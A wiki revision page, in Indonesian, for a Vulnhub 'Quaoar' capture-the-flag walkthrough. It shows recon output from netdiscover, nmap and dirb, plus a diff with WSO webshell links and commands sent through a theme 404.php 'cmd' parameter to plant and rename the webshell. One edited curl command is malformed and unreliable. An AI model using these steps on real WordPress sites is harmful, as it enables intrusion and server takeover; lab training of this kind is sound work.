Difference between revisions of "CTF Quaoar: Walkthrough"

From OnnoWiki
Jump to navigation Jump to search
Line 906: Line 906:
 
  https://github.com/mIcHyAmRaNe/wso-webshell/blob/master/wso.php
 
  https://github.com/mIcHyAmRaNe/wso-webshell/blob/master/wso.php
 
  https://raw.githubusercontent.com/mIcHyAmRaNe/wso-webshell/master/wso.php
 
  https://raw.githubusercontent.com/mIcHyAmRaNe/wso-webshell/master/wso.php
 +
https://raw.githubusercontent.com/tennc/webshell/master/xakep-shells/PHP/wso.txt
  
Copy paste ke /home/kali/wso.php
+
Copy paste ke /home/kali/Downloads/wso.txt
 
Rename
 
Rename
  
Line 914: Line 915:
 
Upload,
 
Upload,
  
  http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=curl%20--data%20"@/home/kali/Downloads/wso.txt"%20>%20wso.txt
+
  http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=curl%20--data%20"@/home/kali/Downloads/wso.txt"%20<%20wso.txt
 
  http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=cat%20wso.txt
 
  http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=cat%20wso.txt
 
  http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=mv wso.txt wso.php
 
  http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=mv wso.txt wso.php

Revision as of 12:40, 24 January 2023

Ambil Quaoar dari Vulnhub

Cek Mesin

Gunakan

netdiscover -r 192.168.0.0/24
Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                                                                                   
                                                                                                                                                                                                                                 
 21 Captured ARP Req/Rep packets, from 20 hosts.   Total size: 1260                                                                                                                                                              
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 .....
 192.168.0.122   08:00:27:b2:18:3a      1      60  PCS Systemtechnik GmbH                                                                                                                                                        
 .....

Scan Quaoar

nmap -v -A 192.168.0.122
    
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-23 21:23 EST
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:23
Completed NSE at 21:23, 0.00s elapsed
Initiating NSE at 21:23
Completed NSE at 21:23, 0.00s elapsed
Initiating NSE at 21:23
Completed NSE at 21:23, 0.00s elapsed
Initiating ARP Ping Scan at 21:23
Scanning 192.168.0.122 [1 port]
Completed ARP Ping Scan at 21:23, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:23
Completed Parallel DNS resolution of 1 host. at 21:23, 0.00s elapsed
Initiating SYN Stealth Scan at 21:23
Scanning 192.168.0.122 [1000 ports]
Discovered open port 995/tcp on 192.168.0.122
Discovered open port 53/tcp on 192.168.0.122
Discovered open port 22/tcp on 192.168.0.122
Discovered open port 110/tcp on 192.168.0.122
Discovered open port 80/tcp on 192.168.0.122
Discovered open port 143/tcp on 192.168.0.122
Discovered open port 993/tcp on 192.168.0.122
Completed SYN Stealth Scan at 21:23, 0.11s elapsed (1000 total ports)
Initiating Service scan at 21:23
Scanning 7 services on 192.168.0.122
Completed Service scan at 21:26, 175.53s elapsed (7 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.122
NSE: Script scanning 192.168.0.122.
Initiating NSE at 21:26
Completed NSE at 21:26, 12.15s elapsed
Initiating NSE at 21:26
Completed NSE at 21:26, 1.11s elapsed
Initiating NSE at 21:26
Completed NSE at 21:26, 0.00s elapsed
Nmap scan report for 192.168.0.122
Host is up (0.00055s latency).
Not shown: 993 closed tcp ports (reset)
PORT    STATE SERVICE    VERSION
22/tcp  open  ssh        OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
|   2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
|_  256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
53/tcp  open  domain     ISC BIND 9.8.1-P1
| dns-nsid: 
|_  bind.version: 9.8.1-P1
80/tcp  open  http       Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_Hackers
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.22 (Ubuntu)
110/tcp open  pop3?
|_pop3-capabilities: RESP-CODES PIPELINING TOP SASL UIDL STLS CAPA
|_ssl-date: 2023-01-24T02:26:15+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Issuer: commonName=ubuntu/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2016-10-07T04:32:43
| Not valid after:  2026-10-07T04:32:43
| MD5:   e242 d8cb 6557 1624 38af 0867 05e9 2677
|_SHA-1: b5d0 537d 0850 11d0 e9c0 fb10 ca07 37c3 af10 9382
143/tcp open  imap       Dovecot imapd
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Issuer: commonName=ubuntu/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2016-10-07T04:32:43
| Not valid after:  2026-10-07T04:32:43
| MD5:   e242 d8cb 6557 1624 38af 0867 05e9 2677
|_SHA-1: b5d0 537d 0850 11d0 e9c0 fb10 ca07 37c3 af10 9382
|_ssl-date: 2023-01-24T02:26:15+00:00; -1s from scanner time.
993/tcp open  ssl/imap   Dovecot imapd
|_ssl-date: 2023-01-24T02:26:15+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Issuer: commonName=ubuntu/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2016-10-07T04:32:43
| Not valid after:  2026-10-07T04:32:43
| MD5:   e242 d8cb 6557 1624 38af 0867 05e9 2677
|_SHA-1: b5d0 537d 0850 11d0 e9c0 fb10 ca07 37c3 af10 9382
995/tcp open  ssl/pop3s?
|_ssl-date: 2023-01-24T02:26:15+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Issuer: commonName=ubuntu/organizationName=Dovecot mail server
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2016-10-07T04:32:43
| Not valid after:  2026-10-07T04:32:43
| MD5:   e242 d8cb 6557 1624 38af 0867 05e9 2677
|_SHA-1: b5d0 537d 0850 11d0 e9c0 fb10 ca07 37c3 af10 9382
MAC Address: 08:00:27:B2:18:3A (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Uptime guess: 0.003 days (since Mon Jan 23 21:22:37 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 

TRACEROUTE
HOP RTT     ADDRESS
1   0.55 ms 192.168.0.122

NSE: Script Post-scanning.
Initiating NSE at 21:26
Completed NSE at 21:26, 0.00s elapsed
Initiating NSE at 21:26
Completed NSE at 21:26, 0.00s elapsed
Initiating NSE at 21:26
Completed NSE at 21:26, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 191.52 seconds
           Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.366KB)

Tampaknya yang mungkin menarik untuk di exploit adalah port web 80.

Pakai dirb

Lakukan,

dirb http://192.168.0.122

Hasilnya

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Jan 23 21:31:24 2023
URL_BASE: http://192.168.0.122/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt  
-----------------

GENERATED WORDS: 4612                                                           

---- Scanning URL: http://192.168.0.122/ ----
+ http://192.168.0.122/cgi-bin/ (CODE:403|SIZE:289)                                                                                                                                                                              
+ http://192.168.0.122/hacking (CODE:200|SIZE:616848)                                                                                                                                                                            
+ http://192.168.0.122/index (CODE:200|SIZE:100)                                                                                                                                                                                 
+ http://192.168.0.122/index.html (CODE:200|SIZE:100)                                                                                                                                                                            
+ http://192.168.0.122/LICENSE (CODE:200|SIZE:1672)                                                                                                                                                                              
+ http://192.168.0.122/robots (CODE:200|SIZE:271)                                                                                                                                                                                
+ http://192.168.0.122/robots.txt (CODE:200|SIZE:271)                                                                                                                                                                            
+ http://192.168.0.122/server-status (CODE:403|SIZE:294)                                                                                                                                                                         
==> DIRECTORY: http://192.168.0.122/upload/                                                                                                                                                                                      
==> DIRECTORY: http://192.168.0.122/wordpress/                                                                                                                                                                                   
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.0.122/upload/ ----
==> DIRECTORY: http://192.168.0.122/upload/account/                                                                                                                                                                              
==> DIRECTORY: http://192.168.0.122/upload/admins/                                                                                                                                                                               
+ http://192.168.0.122/upload/config (CODE:200|SIZE:0)                                                                                                                                                                           
==> DIRECTORY: http://192.168.0.122/upload/framework/                                                                                                                                                                            
==> DIRECTORY: http://192.168.0.122/upload/include/                                                                                                                                                                              
+ http://192.168.0.122/upload/index (CODE:200|SIZE:3040)                                                                                                                                                                         
+ http://192.168.0.122/upload/index.php (CODE:200|SIZE:3040)                                                                                                                                                                     
==> DIRECTORY: http://192.168.0.122/upload/languages/                                                                                                                                                                            
==> DIRECTORY: http://192.168.0.122/upload/media/                                                                                                                                                                                
==> DIRECTORY: http://192.168.0.122/upload/modules/                                                                                                                                                                              
==> DIRECTORY: http://192.168.0.122/upload/page/                                                                                                                                                                                 
==> DIRECTORY: http://192.168.0.122/upload/search/                                                                                                                                                                               
==> DIRECTORY: http://192.168.0.122/upload/temp/                                                                                                                                                                                 
==> DIRECTORY: http://192.168.0.122/upload/templates/                                                                                                                                                                            
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/ ----
==> DIRECTORY: http://192.168.0.122/wordpress/index/                                                                                                                                                                             
+ http://192.168.0.122/wordpress/index.php (CODE:301|SIZE:0)                                                                                                                                                                     
+ http://192.168.0.122/wordpress/license (CODE:200|SIZE:19930)                                                                                                                                                                   
+ http://192.168.0.122/wordpress/readme (CODE:200|SIZE:7195)                                                                                                                                                                     
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/                                                                                                                                                                          
+ http://192.168.0.122/wordpress/wp-blog-header (CODE:200|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/wordpress/wp-config (CODE:200|SIZE:0)                                                                                                                                                                     
==> DIRECTORY: http://192.168.0.122/wordpress/wp-content/                                                                                                                                                                        
+ http://192.168.0.122/wordpress/wp-cron (CODE:200|SIZE:0)                                                                                                                                                                       
==> DIRECTORY: http://192.168.0.122/wordpress/wp-includes/                                                                                                                                                                       
+ http://192.168.0.122/wordpress/wp-links-opml (CODE:200|SIZE:217)                                                                                                                                                               
+ http://192.168.0.122/wordpress/wp-load (CODE:200|SIZE:0)                                                                                                                                                                       
+ http://192.168.0.122/wordpress/wp-login (CODE:200|SIZE:2530)                                                                                                                                                                   
+ http://192.168.0.122/wordpress/wp-mail (CODE:500|SIZE:3011)                                                                                                                                                                    
+ http://192.168.0.122/wordpress/wp-settings (CODE:500|SIZE:0)                                                                                                                                                                   
+ http://192.168.0.122/wordpress/wp-signup (CODE:302|SIZE:0)                                                                                                                                                                     
+ http://192.168.0.122/wordpress/wp-trackback (CODE:200|SIZE:135)                                                                                                                                                                
+ http://192.168.0.122/wordpress/xmlrpc (CODE:200|SIZE:42)                                                                                                                                                                       
+ http://192.168.0.122/wordpress/xmlrpc.php (CODE:200|SIZE:42)                                                                                                                                                                   
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/account/ ----
==> DIRECTORY: http://192.168.0.122/upload/account/css/                                                                                                                                                                          
+ http://192.168.0.122/upload/account/forgot (CODE:302|SIZE:0)                                                                                                                                                                   
+ http://192.168.0.122/upload/account/index (CODE:302|SIZE:0)                                                                                                                                                                    
+ http://192.168.0.122/upload/account/index.php (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/upload/account/login (CODE:302|SIZE:0)                                                                                                                                                                    
+ http://192.168.0.122/upload/account/logout (CODE:302|SIZE:0)                                                                                                                                                                   
+ http://192.168.0.122/upload/account/preferences (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/upload/account/signup (CODE:302|SIZE:0)                                                                                                                                                                   
==> DIRECTORY: http://192.168.0.122/upload/account/templates/                                                                                                                                                                    
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/ ----
==> DIRECTORY: http://192.168.0.122/upload/admins/access/                                                                                                                                                                        
==> DIRECTORY: http://192.168.0.122/upload/admins/addons/                                                                                                                                                                        
==> DIRECTORY: http://192.168.0.122/upload/admins/admintools/                                                                                                                                                                    
==> DIRECTORY: http://192.168.0.122/upload/admins/groups/                                                                                                                                                                        
+ http://192.168.0.122/upload/admins/index (CODE:302|SIZE:0)                                                                                                                                                                     
+ http://192.168.0.122/upload/admins/index.php (CODE:302|SIZE:0)                                                                                                                                                                 
==> DIRECTORY: http://192.168.0.122/upload/admins/interface/                                                                                                                                                                     
==> DIRECTORY: http://192.168.0.122/upload/admins/languages/                                                                                                                                                                     
==> DIRECTORY: http://192.168.0.122/upload/admins/login/                                                                                                                                                                         
==> DIRECTORY: http://192.168.0.122/upload/admins/logout/                                                                                                                                                                        
==> DIRECTORY: http://192.168.0.122/upload/admins/media/                                                                                                                                                                         
==> DIRECTORY: http://192.168.0.122/upload/admins/modules/                                                                                                                                                                       
==> DIRECTORY: http://192.168.0.122/upload/admins/pages/                                                                                                                                                                         
==> DIRECTORY: http://192.168.0.122/upload/admins/preferences/                                                                                                                                                                   
==> DIRECTORY: http://192.168.0.122/upload/admins/profiles/                                                                                                                                                                      
==> DIRECTORY: http://192.168.0.122/upload/admins/service/                                                                                                                                                                       
==> DIRECTORY: http://192.168.0.122/upload/admins/settings/                                                                                                                                                                      
==> DIRECTORY: http://192.168.0.122/upload/admins/start/                                                                                                                                                                         
==> DIRECTORY: http://192.168.0.122/upload/admins/support/                                                                                                                                                                       
==> DIRECTORY: http://192.168.0.122/upload/admins/templates/                                                                                                                                                                     
==> DIRECTORY: http://192.168.0.122/upload/admins/users/                                                                                                                                                                         
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/framework/ ----
==> DIRECTORY: http://192.168.0.122/upload/framework/functions/                                                                                                                                                                  
+ http://192.168.0.122/upload/framework/index (CODE:302|SIZE:0)                                                                                                                                                                  
+ http://192.168.0.122/upload/framework/index.php (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/upload/framework/summary (CODE:403|SIZE:88)                                                                                                                                                               
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/include/ ----
+ http://192.168.0.122/upload/include/index (CODE:302|SIZE:0)                                                                                                                                                                    
+ http://192.168.0.122/upload/include/index.php (CODE:302|SIZE:0)                                                                                                                                                                
==> DIRECTORY: http://192.168.0.122/upload/include/yui/                                                                                                                                                                          
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/languages/ ----
+ http://192.168.0.122/upload/languages/index (CODE:302|SIZE:0)                                                                                                                                                                  
+ http://192.168.0.122/upload/languages/index.php (CODE:302|SIZE:0)                                                                                                                                                              
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/media/ ----
+ http://192.168.0.122/upload/media/index (CODE:302|SIZE:0)                                                                                                                                                                      
+ http://192.168.0.122/upload/media/index.php (CODE:302|SIZE:0)                                                                                                                                                                  
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/modules/ ----
+ http://192.168.0.122/upload/modules/admin (CODE:403|SIZE:79)                                                                                                                                                                   
+ http://192.168.0.122/upload/modules/admin.php (CODE:403|SIZE:79)                                                                                                                                                               
+ http://192.168.0.122/upload/modules/index (CODE:302|SIZE:0)                                                                                                                                                                    
+ http://192.168.0.122/upload/modules/index.php (CODE:302|SIZE:0)                                                                                                                                                                
==> DIRECTORY: http://192.168.0.122/upload/modules/news/                                                                                                                                                                         
==> DIRECTORY: http://192.168.0.122/upload/modules/wysiwyg/                                                                                                                                                                      
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/page/ ----
+ http://192.168.0.122/upload/page/index (CODE:200|SIZE:0)                                                                                                                                                                       
+ http://192.168.0.122/upload/page/index.php (CODE:200|SIZE:0)                                                                                                                                                                   
==> DIRECTORY: http://192.168.0.122/upload/page/posts/                                                                                                                                                                           
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/search/ ----
+ http://192.168.0.122/upload/search/index (CODE:200|SIZE:3627)                                                                                                                                                                  
+ http://192.168.0.122/upload/search/index.php (CODE:200|SIZE:3627)                                                                                                                                                              
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/temp/ ----
+ http://192.168.0.122/upload/temp/index (CODE:302|SIZE:0)                                                                                                                                                                       
+ http://192.168.0.122/upload/temp/index.php (CODE:302|SIZE:0)                                                                                                                                                                   
==> DIRECTORY: http://192.168.0.122/upload/temp/search/                                                                                                                                                                          
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/templates/ ----
==> DIRECTORY: http://192.168.0.122/upload/templates/blank/                                                                                                                                                                      
+ http://192.168.0.122/upload/templates/index (CODE:302|SIZE:0)                                                                                                                                                                  
+ http://192.168.0.122/upload/templates/index.php (CODE:302|SIZE:0)                                                                                                                                                              
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/index/ ----
(!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}.
    (Try using FineTunning: '-f')
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-admin/ ----
+ http://192.168.0.122/wordpress/wp-admin/about (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/wordpress/wp-admin/admin (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)                                                                                                                                                            
+ http://192.168.0.122/wordpress/wp-admin/comment (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/wordpress/wp-admin/credits (CODE:302|SIZE:0)                                                                                                                                                              
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/css/                                                                                                                                                                      
+ http://192.168.0.122/wordpress/wp-admin/customize (CODE:302|SIZE:0)                                                                                                                                                            
+ http://192.168.0.122/wordpress/wp-admin/edit (CODE:302|SIZE:0)                                                                                                                                                                 
+ http://192.168.0.122/wordpress/wp-admin/export (CODE:302|SIZE:0)                                                                                                                                                               
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/images/                                                                                                                                                                   
+ http://192.168.0.122/wordpress/wp-admin/import (CODE:302|SIZE:0)                                                                                                                                                               
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/includes/                                                                                                                                                                 
+ http://192.168.0.122/wordpress/wp-admin/index (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/wordpress/wp-admin/index.php (CODE:302|SIZE:0)                                                                                                                                                            
+ http://192.168.0.122/wordpress/wp-admin/install (CODE:200|SIZE:1080)                                                                                                                                                           
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/js/                                                                                                                                                                       
+ http://192.168.0.122/wordpress/wp-admin/link (CODE:302|SIZE:0)                                                                                                                                                                 
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/maint/                                                                                                                                                                    
+ http://192.168.0.122/wordpress/wp-admin/media (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/wordpress/wp-admin/menu (CODE:500|SIZE:0)                                                                                                                                                                 
+ http://192.168.0.122/wordpress/wp-admin/moderation (CODE:302|SIZE:0)                                                                                                                                                           
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/network/                                                                                                                                                                  
+ http://192.168.0.122/wordpress/wp-admin/options (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/wordpress/wp-admin/plugins (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/wordpress/wp-admin/post (CODE:302|SIZE:0)                                                                                                                                                                 
+ http://192.168.0.122/wordpress/wp-admin/profile (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/wordpress/wp-admin/themes (CODE:302|SIZE:0)                                                                                                                                                               
+ http://192.168.0.122/wordpress/wp-admin/tools (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/wordpress/wp-admin/update (CODE:302|SIZE:0)                                                                                                                                                               
+ http://192.168.0.122/wordpress/wp-admin/upgrade (CODE:200|SIZE:1173)                                                                                                                                                           
+ http://192.168.0.122/wordpress/wp-admin/upload (CODE:302|SIZE:0)                                                                                                                                                               
==> DIRECTORY: http://192.168.0.122/wordpress/wp-admin/user/                                                                                                                                                                     
+ http://192.168.0.122/wordpress/wp-admin/users (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/wordpress/wp-admin/widgets (CODE:302|SIZE:0)                                                                                                                                                              
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-content/ ----
+ http://192.168.0.122/wordpress/wp-content/index (CODE:200|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/wordpress/wp-content/index.php (CODE:200|SIZE:0)                                                                                                                                                          
==> DIRECTORY: http://192.168.0.122/wordpress/wp-content/plugins/                                                                                                                                                                
==> DIRECTORY: http://192.168.0.122/wordpress/wp-content/themes/                                                                                                                                                                 
==> DIRECTORY: http://192.168.0.122/wordpress/wp-content/upgrade/                                                                                                                                                                
==> DIRECTORY: http://192.168.0.122/wordpress/wp-content/uploads/                                                                                                                                                                
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/account/css/ ----
+ http://192.168.0.122/upload/account/css/frontend (CODE:200|SIZE:1931)                                                                                                                                                          
+ http://192.168.0.122/upload/account/css/index (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/upload/account/css/index.php (CODE:302|SIZE:0)                                                                                                                                                            
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/account/templates/ ----
+ http://192.168.0.122/upload/account/templates/index (CODE:302|SIZE:0)                                                                                                                                                          
+ http://192.168.0.122/upload/account/templates/index.php (CODE:302|SIZE:0)                                                                                                                                                      
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/access/ ----
+ http://192.168.0.122/upload/admins/access/index (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/upload/admins/access/index.php (CODE:302|SIZE:0)                                                                                                                                                          
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/addons/ ----
+ http://192.168.0.122/upload/admins/addons/index (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/upload/admins/addons/index.php (CODE:302|SIZE:0)                                                                                                                                                          
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/admintools/ ----
+ http://192.168.0.122/upload/admins/admintools/index (CODE:302|SIZE:0)                                                                                                                                                          
+ http://192.168.0.122/upload/admins/admintools/index.php (CODE:302|SIZE:0)                                                                                                                                                      
+ http://192.168.0.122/upload/admins/admintools/tool (CODE:302|SIZE:0)                                                                                                                                                           
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/groups/ ----
+ http://192.168.0.122/upload/admins/groups/add (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/upload/admins/groups/groups (CODE:302|SIZE:0)                                                                                                                                                             
+ http://192.168.0.122/upload/admins/groups/index (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/upload/admins/groups/index.php (CODE:302|SIZE:0)                                                                                                                                                          
+ http://192.168.0.122/upload/admins/groups/save (CODE:302|SIZE:0)                                                                                                                                                               
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/interface/ ----
+ http://192.168.0.122/upload/admins/interface/index (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/admins/interface/index.php (CODE:302|SIZE:0)                                                                                                                                                       
+ http://192.168.0.122/upload/admins/interface/version (CODE:403|SIZE:90)                                                                                                                                                        
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/languages/ ----
+ http://192.168.0.122/upload/admins/languages/details (CODE:302|SIZE:0)                                                                                                                                                         
+ http://192.168.0.122/upload/admins/languages/index (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/admins/languages/index.php (CODE:302|SIZE:0)                                                                                                                                                       
+ http://192.168.0.122/upload/admins/languages/install (CODE:500|SIZE:0)                                                                                                                                                         
+ http://192.168.0.122/upload/admins/languages/uninstall (CODE:302|SIZE:0)                                                                                                                                                       
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/login/ ----
==> DIRECTORY: http://192.168.0.122/upload/admins/login/forgot/                                                                                                                                                                  
+ http://192.168.0.122/upload/admins/login/index (CODE:200|SIZE:2929)                                                                                                                                                            
+ http://192.168.0.122/upload/admins/login/index.php (CODE:200|SIZE:2929)                                                                                                                                                        
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/logout/ ----
+ http://192.168.0.122/upload/admins/logout/index (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/upload/admins/logout/index.php (CODE:302|SIZE:0)                                                                                                                                                          
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/media/ ----
+ http://192.168.0.122/upload/admins/media/index (CODE:302|SIZE:0)                                                                                                                                                               
+ http://192.168.0.122/upload/admins/media/index.php (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/admins/media/thumb (CODE:200|SIZE:0)                                                                                                                                                               
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/modules/ ----
+ http://192.168.0.122/upload/admins/modules/details (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/admins/modules/index (CODE:302|SIZE:0)                                                                                                                                                             
+ http://192.168.0.122/upload/admins/modules/index.php (CODE:302|SIZE:0)                                                                                                                                                         
+ http://192.168.0.122/upload/admins/modules/install (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/admins/modules/uninstall (CODE:302|SIZE:0)                                                                                                                                                         
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/pages/ ----
+ http://192.168.0.122/upload/admins/pages/add (CODE:302|SIZE:0)                                                                                                                                                                 
+ http://192.168.0.122/upload/admins/pages/delete (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/upload/admins/pages/index (CODE:302|SIZE:0)                                                                                                                                                               
+ http://192.168.0.122/upload/admins/pages/index.php (CODE:302|SIZE:0)                                                                                                                                                           
+ http://192.168.0.122/upload/admins/pages/modify (CODE:302|SIZE:0)                                                                                                                                                              
+ http://192.168.0.122/upload/admins/pages/restore (CODE:302|SIZE:0)                                                                                                                                                             
+ http://192.168.0.122/upload/admins/pages/save (CODE:302|SIZE:0)                                                                                                                                                                
+ http://192.168.0.122/upload/admins/pages/sections (CODE:302|SIZE:0)                                                                                                                                                            
+ http://192.168.0.122/upload/admins/pages/settings (CODE:302|SIZE:0)                                                                                                                                                             
+ http://192.168.0.122/upload/admins/pages/trash (CODE:302|SIZE:0)                                                                                                                                                                
                                                                                                                                                                                                                                  
---- Entering directory: http://192.168.0.122/upload/admins/preferences/ ----
+ http://192.168.0.122/upload/admins/preferences/index (CODE:302|SIZE:0)                                                                                                                                                         
+ http://192.168.0.122/upload/admins/preferences/index.php (CODE:302|SIZE:0)                                                                                                                                                     
+ http://192.168.0.122/upload/admins/preferences/save (CODE:302|SIZE:0)                                                                                                                                                          
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/profiles/ ----
+ http://192.168.0.122/upload/admins/profiles/index (CODE:200|SIZE:324)                                                                                                                                                          
+ http://192.168.0.122/upload/admins/profiles/index.php (CODE:200|SIZE:324)                                                                                                                                                      
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/service/ ----
+ http://192.168.0.122/upload/admins/service/index (CODE:302|SIZE:0)                                                                                                                                                             
+ http://192.168.0.122/upload/admins/service/index.php (CODE:302|SIZE:0)                                                                                                                                                         
                                                                                                                                                                                                                                 
---- Entering directory: http://192.168.0.122/upload/admins/settings/ ----
+ http://192.168.0.122/upload/admins/settings/index (CODE:302|SIZE:0)                                                                                                                                                            
+ http://192.168.0.122/upload/admins/settings/index.php (CODE:302|SIZE:0)                                                                                                                                                        
+ http://192.168.0.122/upload/admins/settings/save (CODE:302|SIZE:0)                                                                                                                                                             
+ http://192.168.0.122/upload/admins/settings/setting (CODE:200|SIZE:3839)                                                                                                                                                       
